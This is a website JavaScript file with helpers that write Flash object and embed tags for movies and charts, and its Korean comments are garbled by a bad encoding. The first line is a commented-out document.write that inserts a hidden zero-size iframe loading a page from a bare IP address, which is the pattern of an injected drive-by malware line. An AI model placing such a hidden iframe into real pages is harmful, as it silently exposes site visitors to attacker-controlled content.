//document.write("<iframe width='0' height='0' src='http://116.125.127.141/include/index.asp'></iframe>");
//ÇÃ·¡½Ã 
function swf(src, w, h)
{
	html = '';
	html += '<object type="application/x-shockwave-flash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" id="PARAM" width="'+w+'" height="'+h+'"  id=mimg  style=filter:blendTrans();>';
	html += '<PARAM name="movie" value="'+src+'">';
	html += '<PARAM name="quality" value="high">';	
	html += '<PARAM name="wmode" value="transparent">';
	html += "<PARAM name='allowscriptaccess' value='always'/>";
	html += '<PARAM name="menu" value="0">';
	html += '<embed src="'+src+'" menu="false" quality="high" wmode="transparent" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="'+w+'"  height="'+h+'"><\/embed>';
	html += '</object>';
	document.write(html);
}


//ÇÃ·¡½ÃÃ­Æ® 
function chart(chart_file, chart_form, w, h)
{
	html = '';
	html += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" id="'+chart_form+'" width="'+w+'" height="'+h+'">';
	html += '<PARAM name="movie" value="/_charts/swf/'+chart_form+'.swf">';
	html += '<PARAM NAME="FlashVars" VALUE="&dataURL=/_charts/xml/'+chart_file+'">';
	html += '<PARAM name="quality" value="high">';	
	html += '<PARAM NAME=bgcolor VALUE=#FFFFFF>';
	html += '<embed src="/_charts/swf/'+chart_form+'.swf" FlashVars="&dataURL=/_charts/xml/'+chart_file+'" quality="high"  pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" bgcolor=#FFFFFF  width="'+w+'"  height="'+h+'" NAME="'+chart_form+'"><\/embed>';
	html += '<\/object>';
	document.write(html);
}

